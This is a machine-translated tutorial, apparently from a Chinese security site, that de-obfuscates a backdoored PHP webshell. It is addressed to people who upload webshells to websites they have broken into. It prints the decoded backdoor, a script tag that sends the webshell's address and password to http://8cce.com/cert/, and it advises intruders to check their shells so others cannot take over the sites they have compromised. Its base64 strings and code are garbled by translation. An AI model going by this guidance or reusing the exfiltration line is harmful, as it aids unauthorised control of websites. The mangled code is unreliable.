Reveal the backdoor in phpwebshell

This article is only intended for those who are still contributing to other people's webshells.

After obtaining the next website, you can upload webshll and escalate the permission.

However, some people will insert a small piece of code in webshell, so that the addresses and passwords of webshells that you have won will be sent to all those who have inserted backdoors in webshell.

This code can be large or small. Below is a phpwebshell that I can find to decrypt the backdoor.

 

First, open the webshell in Notepad. We can see that most of the code of this shell is base64-encoded. The code is decoded during runtime, so that no one else can directly see the plaintext code.

 

 

 

The next step is the decryption process. First, change eval to print_r.

 

 

 

 

Let's talk about how to set up the PHP environment before decryption.

Then save and run.

 

 

 

 

After running, you can see that the basic code is directly displayed, so that you can get most of the Code in this webshell. However, some of the Code in the figure is base64-encoded, but it is only a small segment, so we can write a small php code to display it.

<? Php
Print_r (base64_decode ('base64-encoded Code '));
?>

Www.2cto.com

First, the first encoding I found is base64_decode ('phnjcmlwdcbzcm9j2h0dha6ly8lmzglnjmlnjmlnj
Ulmkulnjmlnkylnkqvjtyzjty1jtcyjtc0lz9jzxj0ptezjnu9 ′)

This code is assigned to the $ copyurl variable.

 

Put the code in the small segment above to decrypt the code in php and then run the code.

As you can see, the running result is blank, but after you view the source file, you can see a script. Specifically, the http: // followed by a percentage sign can be decoded using the URL.

This is the decoded URL.
<Script src = 'HTTP: // 8cce.com/cert /? Cert = 13 & u =

Copy this suspicious script and put it in the text.

 

In the previous section of base64 encoding, I found the base64_decode ('jz48l3njcmlwdd4 = ') that is assigned to the variable $ copyurll ')
After decoding the code using the above method, the result is: '> </script>

This code exactly integrates with the previously decrypted Section into a complete section of script

<Script src = 'HTTP: // 8cce.com/cert /? Cert = 13 & u = '> </script>

 

Then we can see what this suspicious code is for, because it is assigned to $ copyurl and $ copyurll respectively, so we can simply search for these two variables.

The following are the search results:

 

Echo "". $ copyurl. $ serveru. "& p =". $ serverp. $ copyurll ."";
In this Code, $ serveru and $ serverp are the webshell address and webshell password respectively.

The complete echo statement is echo <script src = 'HTTP: // 8cce.com/cert /? Cert = 13 & u = webshell address & p = webshell password '> </script>

Combined with the previous echo code, we can see that after verifying that the webshell password is correct, we can submit the password to the decrypted URL through script.

 

Through the above decryption, we can see that this webshell has been inserted into a backdoor, of course, there may be more than this backdoor.

So in the future, when using webshell, you should first pay attention to whether the webshell has been inserted. Otherwise, the website that you may win will be easily accessed by others and your webshell will control the website.